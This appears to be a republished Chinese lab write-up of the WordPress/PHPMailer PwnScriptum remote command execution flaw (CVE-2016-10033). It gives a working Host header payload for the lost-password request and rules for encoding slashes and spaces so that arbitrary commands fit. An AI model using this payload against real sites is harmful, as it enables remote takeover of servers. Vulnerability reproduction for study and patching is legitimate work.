WordPress 任意命令执行漏洞 (PwnScriptum)

Posted whited

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WordPress 任意命令执行漏洞 (PwnScriptum)相关的知识,希望对你有一定的参考价值。

漏洞简介:

WordPress 使用phpMailer组件向用户发送邮件。PHP,Mailer(版本<5.2.18)存在远程命令执行漏洞,攻击者只需巧妙的构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害.

漏洞页面:

http://your-ip:8080/wp-login.php?action=lostpassword

访问URL 输入一个存在的用户 点击获取新密码 burp抓包 修改HOST

 

输入一个存在的用户 点击获取新密码 burp抓包 修改HOST

请求包的HOST点的参数值就是漏洞的payload点

Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

 

 docker exec -it your-CONTAINER ID  /bin/bash 进入容器

 

 可以发现成功创建success

payload转换规则:

1.payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替

2.payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

 

以上是关于WordPress 任意命令执行漏洞 (PwnScriptum)的主要内容,如果未能解决你的问题,请参考以下文章

WordPress 4.6远程执行代码漏洞(PwnScriptum)CVE-2016-10033

WordPress 4.6远程执行代码漏洞(PwnScriptum)CVE-2016-10033

WordPress删除任意文件/执行任意代码安全漏洞临时修复方法

安全-Wordpress 小于等于4.6.1版本任意代码执行漏洞复现(i春秋)

最新WordPress漏洞,黑客可轻松控制您的网站

eyoucms 1.5.5任意命令执行漏洞(0day)